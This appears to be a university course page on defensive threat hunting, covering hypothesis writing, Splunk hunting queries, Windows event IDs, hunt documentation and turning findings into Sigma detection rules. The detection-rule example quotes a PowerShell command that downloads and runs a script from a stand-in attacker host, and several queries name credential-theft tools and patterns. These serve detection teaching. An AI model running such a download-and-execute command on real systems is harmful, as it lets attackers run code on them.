Skip to content
CSY301 Week 09 Advanced

Apply hypothesis-driven hunting before moving to reading resources.

Threat Intelligence

Track your progress through this week's content

Mental Model

"Assume breach, then prove yourself wrong. Alerts find known threats; hunting finds the threats that evade your alerts." — Threat Hunting Principle

Traditional security waits for alerts. But sophisticated adversaries specifically design their operations to avoid triggering alerts—they use legitimate tools, blend into normal traffic, and move slowly to stay under detection thresholds. Threat hunting flips the paradigm: instead of waiting, hunters proactively search for evidence of compromise that automated systems miss.

Learning Outcomes

By the end of this week, you will be able to:

  • LO1: Define threat hunting and distinguish it from reactive detection and monitoring
  • LO2: Develop well-formed, threat-informed hunting hypotheses
  • LO3: Identify data sources and telemetry required for effective hunting
  • LO4: Apply hunting techniques including stacking, clustering, and behavioral analysis
  • LO5: Execute systematic hunts and convert findings into detection improvements

1. What Is Threat Hunting?

Threat hunting is the proactive, hypothesis-driven search for threats that have evaded existing security controls. Unlike monitoring (which waits for alerts) or incident response (which reacts to confirmed incidents), hunting actively seeks evidence of compromise before alerts fire.

Hunting vs. Monitoring vs. Incident Response

┌─────────────────────────────────────────────────────────────────┐
│         SECURITY OPERATIONS PARADIGMS COMPARED                  │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  MONITORING (Reactive - Alert-Driven)                          │
│  ────────────────────────────────────                          │
│  • Waits for alerts to trigger                                 │
│  • Rule-based detection                                        │
│  • Automated at scale                                          │
│  • Finds KNOWN threats                                         │
│  • High volume, low touch                                      │
│                                                                 │
│  INCIDENT RESPONSE (Reactive - Event-Driven)                   │
│  ───────────────────────────────────────────                   │
│  • Responds to confirmed incidents                             │
│  • Investigation and containment                               │
│  • Human-intensive                                             │
│  • Finds CONFIRMED threats                                     │
│  • Low volume, high touch                                      │
│                                                                 │
│  THREAT HUNTING (Proactive - Hypothesis-Driven)                │
│  ──────────────────────────────────────────────                │
│  • Actively seeks evidence                                     │
│  • Hypothesis-based exploration                                │
│  • Human creativity + data analysis                            │
│  • Finds UNKNOWN threats                                       │
│  • Medium volume, high expertise                               │
│                                                                 │
│  ═══════════════════════════════════════════════════════════   │
│  All three are necessary. They complement, not replace.        │
│  ═══════════════════════════════════════════════════════════   │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

The Hunting Maturity Model (HMM)

Organizations progress through maturity levels in their hunting capabilities:

┌─────────────────────────────────────────────────────────────────┐
│                  HUNTING MATURITY MODEL                         │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  HMM0 - INITIAL                                                │
│  ─────────────────                                             │
│  • No hunting capability                                       │
│  • Purely reactive posture                                     │
│  • Limited data collection                                     │
│  • Relies entirely on vendor alerts                            │
│                                                                 │
│  HMM1 - MINIMAL                                                │
│  ─────────────────                                             │
│  • Some ad-hoc hunting                                         │
│  • Relies primarily on IOC searches                            │
│  • Limited methodology                                         │
│  • Hunting after incidents                                     │
│                                                                 │
│  HMM2 - PROCEDURAL                                             │
│  ──────────────────                                            │
│  • Documented hunting procedures                               │
│  • Regular hunting cadence                                     │
│  • Some hypothesis-based hunts                                 │
│  • Uses threat intelligence                                    │
│                                                                 │
│  HMM3 - INNOVATIVE                                             │
│  ─────────────────                                             │
│  • Custom tools and techniques                                 │
│  • Threat intel driven hypotheses                              │
│  • Creates new detection methods                               │
│  • Shares findings with community                              │
│                                                                 │
│  HMM4 - LEADING                                                │
│  ─────────────────                                             │
│  • Automated hunt assistance                                   │
│  • Original threat research                                    │
│  • Contributes to industry knowledge                           │
│  • Continuous methodology improvement                          │
│                                                                 │
│  Most organizations: HMM1-HMM2                                 │
│  Goal: Progress toward HMM3                                    │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

Requirements for Effective Hunting

Data

Tools

Skills

Time

Key Insight: You can't hunt what you can't see. Data collection and retention are prerequisites—if you don't have endpoint telemetry, you can't hunt for process injection. If you don't retain logs for 90 days, you can't find slow-moving adversaries.

2. Hypothesis-Driven Hunting

Effective hunts start with a hypothesis—a testable statement about adversary behavior that you seek to prove or disprove. Without hypotheses, hunting becomes aimless log browsing.

Hypothesis Structure

┌─────────────────────────────────────────────────────────────────┐
│                   HUNTING HYPOTHESIS TEMPLATE                   │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  "If [THREAT/TECHNIQUE] is present in our environment,         │
│   we would expect to see [OBSERVABLE EVIDENCE]                  │
│   in [DATA SOURCE]."                                           │
│                                                                 │
│  ───────────────────────────────────────────────────────────   │
│                                                                 │
│  EXAMPLE HYPOTHESES:                                           │
│                                                                 │
│  1. Credential Theft                                           │
│     "If attackers are using Mimikatz in our environment,       │
│      we would expect to see lsass.exe memory access            │
│      from unusual processes in our EDR telemetry."             │
│                                                                 │
│  2. Lateral Movement                                           │
│     "If attackers are moving laterally via PsExec,             │
│      we would expect to see PSEXESVC.exe service creation      │
│      in Windows event logs on multiple systems."               │
│                                                                 │
│  3. Data Exfiltration                                          │
│     "If attackers are staging data for exfiltration,           │
│      we would expect to see large archive file creation        │
│      in unusual directories in our file monitoring."           │
│                                                                 │
│  4. Persistence                                                │
│     "If attackers have established scheduled task persistence, │
│      we would expect to see tasks created by non-admin         │
│      processes in Windows Event ID 4698."                      │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

Hypothesis Sources

Where do hunting hypotheses come from?

Source Description Example
Threat Intelligence TTPs from threat reports about actors targeting your industry "APT29 uses WMI for persistence—let's hunt for suspicious WMI subscriptions"
MITRE ATT&CK Techniques you haven't validated detection for "We have no detection for T1055 Process Injection—let's hunt for indicators"
Incidents/Near-Misses Techniques seen in your environment or industry peers "Our peer was hit via malicious Office macros—let's hunt for similar activity"
Detection Gaps Known blind spots in your monitoring "We don't monitor PowerShell on workstations—let's hunt there"
Anomaly Investigation Unusual patterns noticed during other work "I noticed unusual DNS queries—let's hunt for DNS tunneling"
Red Team Results Techniques that succeeded in assessments "Red team used Kerberoasting—let's hunt for evidence in production"

The Hunting Loop

┌─────────────────────────────────────────────────────────────────┐
│                      THE HUNTING LOOP                           │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│         ┌──────────────────────────────────────────┐           │
│         │                                          │           │
│         ▼                                          │           │
│  ┌─────────────┐                                   │           │
│  │  HYPOTHESIS │ ◄── Intel, ATT&CK, Incidents      │           │
│  │  CREATION   │                                   │           │
│  └──────┬──────┘                                   │           │
│         │                                          │           │
│         ▼                                          │           │
│  ┌─────────────┐                                   │           │
│  │    DATA     │                                   │           │
│  │ COLLECTION  │ ◄── Identify required telemetry   │           │
│  └──────┬──────┘                                   │           │
│         │                                          │           │
│         ▼                                          │           │
│  ┌─────────────┐                                   │           │
│  │   ANALYSIS  │ ◄── Query, stack, cluster         │           │
│  │  EXECUTION  │                                   │           │
│  └──────┬──────┘                                   │           │
│         │                                          │           │
│         ├─────────────┐                            │           │
│         │             │                            │           │
│         ▼             ▼                            │           │
│  ┌───────────┐  ┌───────────┐                      │           │
│  │  FINDING  │  │ NO FINDING│                      │           │
│  │  (Threat) │  │ (Clean)   │                      │           │
│  └─────┬─────┘  └─────┬─────┘                      │           │
│        │              │                            │           │
│        ▼              ▼                            │           │
│  ┌───────────┐  ┌───────────┐                      │           │
│  │INVESTIGATE│  │  REFINE   │──────────────────────┘           │
│  │& RESPOND  │  │HYPOTHESIS │                                  │
│  └─────┬─────┘  └───────────┘                                  │
│        │                                                       │
│        ▼                                                       │
│  ┌─────────────┐                                               │
│  │  IMPROVE    │ ◄── Create detection rule                     │
│  │ DETECTION   │     Document technique                        │
│  └─────────────┘     Share with team                           │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

Key Insight: A hunt without a hypothesis is just browsing logs. Hypotheses focus effort, make hunts measurable, and ensure you're looking for threats that matter to your organization.

3. Hunting Techniques

Multiple analytical approaches help find hidden threats. Effective hunters combine techniques based on available data and hypothesis requirements.

Technique 1: IOC Searching

Search for known-bad indicators from threat intelligence:

# IOC-Based Searching Examples (Splunk SPL)

# Search for known malicious file hashes
index=edr file_hash IN (
    "a1b2c3d4e5f6...",
    "b2c3d4e5f6a1...",
    "c3d4e5f6a1b2..."
)

# Search for known C2 domains
index=dns query IN (
    "evil-domain.com",
    "malware-c2.net",
    "*.badactor.org"
)

# Search for known attacker IPs
index=firewall dest_ip IN (
    "192.168.1.100",
    "10.0.0.50"
)
| stats count by src_ip, dest_ip, dest_port

# Limitations of IOC searching:
# - Only finds KNOWN threats
# - IOCs change frequently (especially IPs/domains)
# - Reactive rather than proactive
# - Best for: validating intel, checking for known campaigns
            

Technique 2: Stacking (Frequency Analysis)

Find rare events that might indicate malicious activity. Principle: attackers do unusual things that stand out statistically.

# Stacking Examples - Finding Rare Events

# Rare processes across environment
index=edr event_type=process_start
| stats count by process_name
| where count < 5
| sort count

# Rare outbound destinations
index=firewall direction=outbound action=allow
| stats count dc(src_ip) as unique_sources by dest_ip
| where count < 10 AND unique_sources < 3
| sort count

# Rare scheduled tasks (potential persistence)
index=windows EventCode=4698
| stats count by TaskName
| where count = 1

# Rare services created
index=windows EventCode=7045
| stats count by ServiceName
| where count < 3

# Rare parent-child process relationships
index=edr event_type=process_start
| stats count by parent_process_name, process_name
| where count < 5
| sort count

# IMPORTANT: Rare ≠ Malicious
# Stacking identifies candidates for investigation
# Human analysis determines if rare = suspicious
            

Technique 3: Clustering (Pattern Grouping)

Group similar activities and look for anomalies within clusters:

# Clustering Examples - Finding Anomalies in Groups

# Group processes by parent, find unusual children
index=edr event_type=process_start parent_process_name="explorer.exe"
| stats count values(process_name) as children by host
| where count > 20
| mvexpand children
| stats count by children
| where count < 5

# Group network connections by process
index=edr event_type=network_connection
| stats sum(bytes_out) as total_bytes
        dc(dest_ip) as unique_destinations
        by process_name
| where unique_destinations > 50 OR total_bytes > 1000000000
| sort -total_bytes

# Group authentications by source IP
index=windows EventCode=4624
| stats count dc(TargetUserName) as unique_users by IpAddress
| where unique_users > 10
| sort -unique_users

# Look for: Outliers in clusters
#           Unexpected groupings
#           Rare combinations within normal groups
            

Technique 4: Behavioral Analysis

Look for suspicious behavior patterns regardless of specific IOCs:

# Behavioral Analysis Examples

# PowerShell with encoded commands (common evasion)
index=windows EventCode=4104
| search ScriptBlockText="*-enc*" OR ScriptBlockText="*-encoded*"
        OR ScriptBlockText="*FromBase64*"
| table _time, ComputerName, ScriptBlockText

# Processes running from suspicious directories
index=edr event_type=process_start
| where match(process_path, "(?i)\\\\(temp|tmp|appdata\\\\local\\\\temp)\\\\")
| stats count by process_name, process_path, host

# Admin tools from non-admin systems
index=edr process_name IN ("psexec.exe", "wmic.exe", "net.exe", "nltest.exe")
| where NOT match(host, "(?i)(admin|jump|bastion)")
| stats count by host, process_name, user

# Network connections from unusual processes
index=edr event_type=network_connection
| where process_name IN ("notepad.exe", "calc.exe", "mspaint.exe")
| stats count by process_name, dest_ip, dest_port

# LSASS access (credential theft indicator)
index=edr event_type=process_access target_process="lsass.exe"
| where source_process NOT IN ("csrss.exe", "services.exe", "svchost.exe")
| stats count by source_process, host

# Focus: What attackers DO, not what files they use
# Behavior persists even when tools change
            

Technique 5: Baseline Deviation

Compare current activity against established baselines:

# Baseline Deviation Examples

# Processes that appeared recently (not in baseline)
index=edr event_type=process_start earliest=-24h
| stats count by process_name
| search NOT [
    search index=edr event_type=process_start earliest=-30d latest=-7d
    | stats count by process_name
    | fields process_name
]

# Users authenticating from new locations
index=windows EventCode=4624 earliest=-24h
| stats values(IpAddress) as recent_ips by TargetUserName
| search NOT [
    search index=windows EventCode=4624 earliest=-90d latest=-7d
    | stats values(IpAddress) as baseline_ips by TargetUserName
    | fields TargetUserName, baseline_ips
]

# Unusual outbound data volumes
index=firewall direction=outbound earliest=-24h
| stats sum(bytes) as daily_bytes by src_ip
| join src_ip [
    search index=firewall direction=outbound earliest=-30d latest=-1d
    | stats avg(bytes) as avg_daily by src_ip
]
| where daily_bytes > (avg_daily * 10)

# Requires: Good baseline data (30-90 days)
#           Understanding of "normal" in your environment
            

4. Data Sources for Hunting

Different data sources enable different types of hunts. Understanding what each source provides helps target hypotheses appropriately.

Essential Data Sources

┌─────────────────────────────────────────────────────────────────┐
│                  HUNTING DATA SOURCES                           │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ENDPOINT TELEMETRY (EDR)                    PRIORITY: HIGH    │
│  ─────────────────────────                                     │
│  • Process creation (parent, child, command line)              │
│  • File operations (create, modify, delete)                    │
│  • Registry modifications                                      │
│  • Network connections per process                             │
│  • Memory operations (injection, access)                       │
│  → Hunt for: Execution, persistence, defense evasion           │
│                                                                 │
│  WINDOWS EVENT LOGS                          PRIORITY: HIGH    │
│  ─────────────────────                                         │
│  • Security (4624, 4625, 4648, 4672, 4698, 4720)              │
│  • PowerShell (4103, 4104)                                     │
│  • Sysmon (if deployed)                                        │
│  • System (7045 services)                                      │
│  → Hunt for: Authentication, privilege use, persistence        │
│                                                                 │
│  NETWORK TELEMETRY                           PRIORITY: HIGH    │
│  ─────────────────────                                         │
│  • Firewall logs (connections, blocks)                         │
│  • DNS queries and responses                                   │
│  • Proxy/web filter logs                                       │
│  • NetFlow/IPFIX                                               │
│  → Hunt for: C2, exfiltration, lateral movement                │
│                                                                 │
│  AUTHENTICATION LOGS                         PRIORITY: MEDIUM  │
│  ─────────────────────                                         │
│  • Active Directory (domain controllers)                       │
│  • VPN authentication                                          │
│  • Cloud identity (Azure AD, Okta)                             │
│  • Application authentication                                  │
│  → Hunt for: Credential abuse, account compromise              │
│                                                                 │
│  CLOUD LOGS                                  PRIORITY: MEDIUM  │
│  ───────────                                                   │
│  • CloudTrail (AWS), Activity Log (Azure)                      │
│  • Office 365/M365 audit logs                                  │
│  • SaaS application logs                                       │
│  → Hunt for: Cloud-based attacks, insider threats              │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

Key Windows Event IDs for Hunting

Event ID Description Hunt Use Case
4624 Successful logon Lateral movement, anomalous access
4625 Failed logon Brute force, password spray
4648 Explicit credential logon Credential use across systems
4672 Special privileges assigned Privilege escalation
4688 Process creation Execution (enable command line logging)
4698 Scheduled task created Persistence mechanisms
4720 User account created Persistence via new accounts
7045 Service installed Persistence, lateral movement
4104 PowerShell script block Malicious scripts, encoded commands
1 (Sysmon) Process creation with hashes Detailed execution tracking
3 (Sysmon) Network connection Process-level network activity
10 (Sysmon) Process access Credential dumping (LSASS access)

5. Executing and Documenting Hunts

Systematic execution and documentation ensure hunts are repeatable, measurable, and valuable beyond finding individual threats.

Hunt Execution Workflow

┌─────────────────────────────────────────────────────────────────┐
│                    HUNT EXECUTION WORKFLOW                      │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  PHASE 1: PREPARATION                                          │
│  ─────────────────────                                         │
│  □ Define hypothesis clearly                                   │
│  □ Identify required data sources                              │
│  □ Verify data availability and retention                      │
│  □ Determine time scope (last 7 days? 30 days?)               │
│  □ Plan initial queries                                        │
│                                                                 │
│  PHASE 2: EXECUTION                                            │
│  ──────────────────                                            │
│  □ Run initial broad query                                     │
│  □ Review result volume—too many? Refine.                      │
│  □ Apply filters to reduce false positives                     │
│  □ Stack/cluster results to find outliers                      │
│  □ Document interesting findings                               │
│                                                                 │
│  PHASE 3: ANALYSIS                                             │
│  ─────────────────                                             │
│  □ For each candidate: Is this expected? Suspicious? Unknown?  │
│  □ Gather additional context for suspicious items              │
│  □ Correlate across data sources                               │
│  □ Determine: Finding, No Finding, or Need More Data           │
│                                                                 │
│  PHASE 4: RESPONSE (if finding)                                │
│  ──────────────────────────────                                │
│  □ Escalate to incident response if confirmed threat           │
│  □ Scope the compromise                                        │
│  □ Preserve evidence                                           │
│  □ Coordinate containment                                      │
│                                                                 │
│  PHASE 5: IMPROVEMENT                                          │
│  ─────────────────────                                         │
│  □ Create/update detection rule for finding                    │
│  □ Document hunt for future reference                          │
│  □ Share learnings with team                                   │
│  □ Identify data gaps encountered                              │
│  □ Queue related hypotheses                                    │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

Hunt Documentation Template

THREAT HUNT DOCUMENTATION
═════════════════════════

HUNT METADATA
─────────────
Hunt ID:        TH-2025-042
Hunter:         [Name]
Date:           2025-01-15
Duration:       4 hours
Status:         Completed - No Finding

HYPOTHESIS
──────────
Statement:      "If attackers are using Kerberoasting in our environment,
                we would expect to see TGS requests for SPNs associated
                with service accounts from workstations."

Source:         Red team report identified Kerberoasting as viable
ATT&CK:         T1558.003 - Kerberoasting
Priority:       High (credential access)

DATA SOURCES
────────────
Primary:        Domain Controller Security Logs (Event 4769)
Secondary:      EDR process telemetry
Time Range:     Last 30 days
Availability:   ✓ All required data available

QUERIES EXECUTED
────────────────
Query 1 - Baseline TGS requests:
    index=windows EventCode=4769
    | stats count by ServiceName, ClientAddress
    | where NOT match(ClientAddress, "^10\\.10\\.(1|2)\\.") [servers]

Query 2 - Anomalous encryption types:
    index=windows EventCode=4769 TicketEncryptionType=0x17
    | stats count by ServiceName, AccountName, ClientAddress

Query 3 - High-volume requesters:
    index=windows EventCode=4769
    | stats dc(ServiceName) as unique_spns by ClientAddress
    | where unique_spns > 10

FINDINGS
────────
Result:         No malicious activity identified

Observations:
- 3 workstations showed >10 unique SPN requests
- Investigated: All were IT admin workstations running
  legitimate management tools
- No anomalous encryption downgrade attempts
- No requests from unexpected sources

False Positives Identified:
- ServiceNow integration queries multiple SPNs (expected)
- Backup software service account (documented)

DETECTION IMPROVEMENTS
──────────────────────
□ Created alert for: TGS requests with RC4 encryption (0x17)
  from non-admin workstations
□ Added exclusions for known legitimate high-volume requesters
□ Documented baseline for future comparison

FOLLOW-UP ACTIONS
─────────────────
□ Schedule re-hunt in 90 days
□ Expand hypothesis to include AS-REP roasting
□ Verify Kerberos logging on all DCs
            

Converting Hunts to Detection Rules

# Example: Hunt Finding → Detection Rule

# HUNT FINDING:
# Discovered PowerShell downloading and executing from temp directory
# Command: powershell -ep bypass -c "IEX(New-Object Net.WebClient).
#          DownloadString('http://evil.com/payload.ps1')"

# DETECTION RULE (Sigma format):
title: PowerShell Download and Execute Pattern
id: 12345678-1234-1234-1234-123456789abc
status: experimental
description: Detects PowerShell downloading and executing scripts
references:
    - Internal Hunt TH-2025-042
author: Security Team
date: 2025/01/15
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    service: powershell
    definition: 'Script block logging must be enabled'
detection:
    selection:
        EventID: 4104
        ScriptBlockText|contains|all:
            - 'Net.WebClient'
            - 'DownloadString'
    condition: selection
falsepositives:
    - Legitimate admin scripts (rare)
level: high

# SPLUNK IMPLEMENTATION:
index=windows EventCode=4104
ScriptBlockText="*Net.WebClient*" ScriptBlockText="*DownloadString*"
| table _time, ComputerName, ScriptBlockText
            

6. Building a Hunting Program

Individual hunts provide value; a hunting program provides sustained, improving capability.

Program Components

┌─────────────────────────────────────────────────────────────────┐
│                    HUNTING PROGRAM ELEMENTS                     │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  PEOPLE                                                         │
│  ──────                                                         │
│  • Dedicated hunters (not just spare SOC time)                 │
│  • Training and skill development                              │
│  • Career path for hunters                                     │
│  • Collaboration with threat intel, IR, red team               │
│                                                                 │
│  PROCESS                                                        │
│  ───────                                                        │
│  • Regular hunting cadence (weekly/monthly)                    │
│  • Hypothesis backlog and prioritization                       │
│  • Documentation standards                                     │
│  • Metrics and reporting                                       │
│  • Feedback loop to detection engineering                      │
│                                                                 │
│  TECHNOLOGY                                                     │
│  ──────────                                                     │
│  • Hunting platform (SIEM, EDR, data lake)                     │
│  • Query tools and automation                                  │
│  • Hypothesis and hunt tracking                                │
│  • Collaboration and knowledge sharing                         │
│                                                                 │
│  INTELLIGENCE                                                   │
│  ────────────                                                   │
│  • Threat intel integration                                    │
│  • ATT&CK coverage mapping                                     │
│  • Industry threat awareness                                   │
│  • Internal incident learnings                                 │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
            

Hunting Program Metrics

Metric Category Specific Metrics Why It Matters
Activity Hunts completed per month, hours spent hunting Shows program is active and resourced
Coverage ATT&CK techniques hunted, % of environment covered Shows breadth of hunting
Findings Threats found, incidents initiated from hunts Demonstrates value (but low numbers okay)
Improvements Detection rules created, gaps identified Shows hunting improves overall security
Efficiency Time to complete hunt, false positive rate Shows program is maturing

Important: "Threats found" is not the primary success metric. A hunt that finds nothing but results in better detection rules is successful. Hunting value includes: threats found, detection improvements, visibility gaps identified, and increased defender knowledge.

Week 09 Quiz

Test your understanding of Threat Hunting Fundamentals.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Take Quiz

Self-Check Questions

Test your understanding of threat hunting:

Question 1

What distinguishes threat hunting from security monitoring? Why are both necessary?

Reveal Answer

Key distinctions:

  • Monitoring: Reactive, alert-driven, automated, finds known threats at scale
  • Hunting: Proactive, hypothesis-driven, human-led, finds unknown threats that evade alerts

Why both are necessary:

  • Monitoring handles volume—you can't manually review every log
  • Hunting handles sophistication—advanced attackers evade automated detection
  • Hunting improves monitoring—findings become new detection rules
  • Together they provide defense against both commodity and advanced threats

Question 2

Create a hunting hypothesis for detecting potential data exfiltration in a corporate environment. Include the hypothesis statement, data sources needed, and initial query approach.

Reveal Answer

Hypothesis:

"If attackers are staging and exfiltrating data from our environment, we would expect to see unusual archive file creation followed by large outbound data transfers to uncommon destinations."

Data sources:

  • Endpoint telemetry (file creation, specifically .zip, .rar, .7z)
  • Firewall/proxy logs (outbound bytes by destination)
  • Network flow data (volume patterns)

Initial queries:

  1. Find archive file creation in unusual locations (not user Downloads)
  2. Stack outbound destinations by total bytes transferred
  3. Correlate: systems with recent archive creation + large outbound transfers
  4. Filter out known backup and file sharing destinations

Question 3

Explain the "stacking" technique in threat hunting. When is it most effective, and what are its limitations?

Reveal Answer

Stacking technique:

Stacking (frequency analysis) counts occurrences of events and identifies rare outliers. Based on the principle that attackers do unusual things that stand out statistically in large datasets.

Most effective when:

  • Large, relatively homogeneous environment (rare really is rare)
  • Good baseline data for comparison
  • Hunting for activities that should be uncommon (new processes, unusual destinations)
  • Initial triage to identify candidates for deeper investigation

Limitations:

  • Rare ≠ malicious—many false positives require human analysis
  • Attackers using common tools may not appear rare
  • Doesn't work well in diverse environments where everything is "rare"
  • Requires sufficient data volume for statistics to be meaningful

Question 4

A hunt completes with no threats found. The hypothesis was well-formed and the data was available. Is this hunt a success or failure? What should happen next?

Reveal Answer

This hunt is a SUCCESS, not a failure.

Why it's successful:

  • Provides confidence that the specific threat isn't present (currently)
  • Validated that detection capability exists for this technique
  • Hunter gained expertise in this attack pattern
  • Documentation enables future re-hunting

What should happen next:

  1. Document the hunt thoroughly (queries, observations, baseline)
  2. Create or validate detection rule for ongoing monitoring
  3. Schedule re-hunt (quarterly?) to check again
  4. Refine hypothesis—are there related techniques to hunt?
  5. Share learnings with team
💡 Key insight

Measuring hunting success solely by threats found creates perverse incentives and undervalues the program.

Question 5

You want to hunt for Kerberoasting attacks (T1558.003) in your environment. What data sources do you need, and what indicators would you look for?

Reveal Answer

Required data sources:

  • Domain Controller Security Logs (Event 4769 - TGS requests)
  • Optionally: EDR for tool execution (Rubeus, Invoke-Kerberoast)

Indicators to hunt for:

  1. Encryption downgrade: TGS requests with RC4 encryption (TicketEncryptionType 0x17) instead of AES—attackers prefer RC4 because it's faster to crack
  2. High volume SPN requests: Single source requesting TGS tickets for many different service accounts in short time
  3. Unusual request sources: TGS requests from workstations that don't normally interact with those services
  4. Tool artifacts: Rubeus.exe, Invoke-Kerberoast in process telemetry

Sample query (Splunk):

index=windows EventCode=4769 TicketEncryptionType=0x17
| stats dc(ServiceName) as spn_count by ClientAddress
| where spn_count > 5

Question 6

How should hunt findings be converted into improved detection capabilities? Describe the process from finding to production detection rule.

Reveal Answer

Finding to detection rule process:

  1. Document the finding:
    • Exact indicators observed
    • Query that found it
    • Context (ATT&CK technique, threat actor if known)
  2. Generalize the pattern:
    • What's the behavior vs. specific IOC?
    • How might variations appear?
    • What's the minimum viable detection?
  3. Write detection rule:
    • Use standard format (Sigma recommended)
    • Include metadata (ATT&CK mapping, severity)
    • Document false positive expectations
  4. Test in staging:
    • Run against historical data
    • Verify it catches the original finding
    • Assess false positive volume
  5. Deploy to production:
    • Start with alerting (not blocking)
    • Monitor false positive rate
    • Tune as needed
  6. Document and share:
    • Update detection catalog
    • Brief SOC on new rule
    • Consider external sharing (ISACs, community)

Lab: Threat Hunt Execution

Objective

Plan and execute a threat hunt using hypothesis-driven methodology, documenting findings and creating detection improvements.

Deliverables

Time Estimate

4-5 hours

Lab Environment Options

Lab Tasks

Part 1: Hypothesis Development (LO2)

  1. Select an ATT&CK technique to hunt (suggestions below)
  2. Research the technique—how does it work? What artifacts?
  3. Write a formal hypothesis statement
  4. Identify required data sources
  5. Plan initial queries

Suggested techniques for hunting:

  • T1059.001 - PowerShell (look for encoded commands)
  • T1053.005 - Scheduled Task (persistence)
  • T1021.002 - SMB/Windows Admin Shares (lateral movement)
  • T1003.001 - LSASS Memory (credential dumping)
  • T1071.001 - Web Protocols (C2 communication)

Part 2: Hunt Execution (LO3, LO4)

  1. Verify data availability in your lab environment
  2. Execute initial broad query
  3. Apply hunting techniques:
    • Stack results to find rare events
    • Cluster by relevant fields
    • Look for behavioral patterns
  4. Document each query and results
  5. Identify candidates for investigation

Part 3: Analysis and Investigation (LO4)

  1. For each candidate:
    • Gather additional context
    • Correlate across data sources
    • Determine: Expected, Suspicious, or Unknown
  2. Document findings (or document clean result)
  3. Identify false positives and their patterns

Part 4: Documentation (LO5)

  1. Complete full hunt documentation using template
  2. Include:
    • Hypothesis and rationale
    • All queries executed
    • Results and analysis
    • Finding or clean result
    • Recommendations

Part 5: Detection Engineering (LO5)

  1. Create a Sigma detection rule based on your hunt
  2. If finding: Rule to detect the specific threat
  3. If clean: Rule to monitor for the technique
  4. Include proper metadata and documentation
  5. Test rule against available data

Self-Assessment Checklist

Hypothesis Quality

  • ☐ Hypothesis is clearly stated and testable
  • ☐ Connected to specific ATT&CK technique
  • ☐ Data sources clearly identified
  • ☐ Observable evidence defined

Hunt Execution

  • ☐ Multiple hunting techniques applied
  • ☐ Queries documented with results
  • ☐ Results analyzed systematically
  • ☐ False positives identified and documented

Documentation

  • ☐ Complete hunt report using template
  • ☐ Clear conclusions (finding or clean)
  • ☐ Recommendations included
  • ☐ Professional quality

Detection Rule

  • ☐ Valid Sigma format
  • ☐ Proper ATT&CK mapping
  • ☐ False positives documented
  • ☐ Tested against data

Portfolio Integration

Save your threat hunting deliverables:

🎯 Hands-On Labs (Free & Essential)

Apply hypothesis-driven hunting before moving to reading resources.

🎮 TryHackMe: Threat Hunting

What you'll do: Build and test hunting hypotheses using real telemetry.
Why it matters: Practicing the hunt loop is the fastest way to build intuition.
Time estimate: 2-3 hours

Start TryHackMe Threat Hunting →

🧪 Splunk BOTS v3: Hunt a Realistic Dataset

What you'll do: Run hunt queries over a public dataset and document findings.
Why it matters: You learn to pivot, refine, and validate at scale.
Time estimate: 2-3 hours

Open Splunk BOTS v3 Dataset →

🛡️ SigmaHQ: Hunt-to-Detection Rule

Task: Translate one hunt finding (or hypothesis) into a Sigma rule.
Why it matters: Hunting value compounds when you ship detections.
Time estimate: 60-90 minutes

Open SigmaHQ →

🧩 Lab: Supply Chain Hunt Hypothesis

What you'll do: Build a hunt hypothesis for a poisoned update scenario.
Why it matters: Supply chain hunts require different telemetry and pivots.
Time estimate: 60-90 minutes

💡 Lab Tip: Document false positives early so you can refine hypotheses quickly.

🧩 Supply Chain Hunt Patterns

Hunting for supply chain compromise focuses on update behavior, build pipeline artifacts, and unexpected signer changes.

Supply chain hunt signals:
- New or rare update signer
- Build pipeline account anomalies
- Unexpected dependency version changes
- Update traffic to unusual domains

📚 Building on CSY101 Week-13: Threat model update paths and trust relationships.

Resources

Required

Sqrrl Threat Hunting Reference (Archive)

Foundational threat hunting methodology from the team that pioneered modern hunting practices.

Threat Hunting Net Archive 60 minutes
Required

Threat Hunter Playbook

Community-developed collection of hunting playbooks mapped to ATT&CK techniques with specific queries and procedures.

ThreatHunter-Playbook (GitHub) 60 minutes (review 3-4 playbooks)
Optional

SANS Threat Hunting Summit Presentations

Video presentations from threat hunting practitioners covering real-world techniques and case studies.

SANS Introduction to Threat Hunting 45 minutes
Optional

MITRE Cyber Analytics Repository (CAR)

Detection analytics that can inform hunting—includes pseudocode and specific implementations.

MITRE CAR 30 minutes

Weekly Reflection

Prompt

Reflect on the relationship between threat hunting and automated detection. How does hunting complement (rather than replace) traditional security monitoring? What skills and mindset does effective hunting require beyond technical query abilities?

Consider: How would you justify a threat hunting program to leadership if hunts often come back "clean" with no findings? What value does hunting provide beyond finding active threats?

Target length: 250-350 words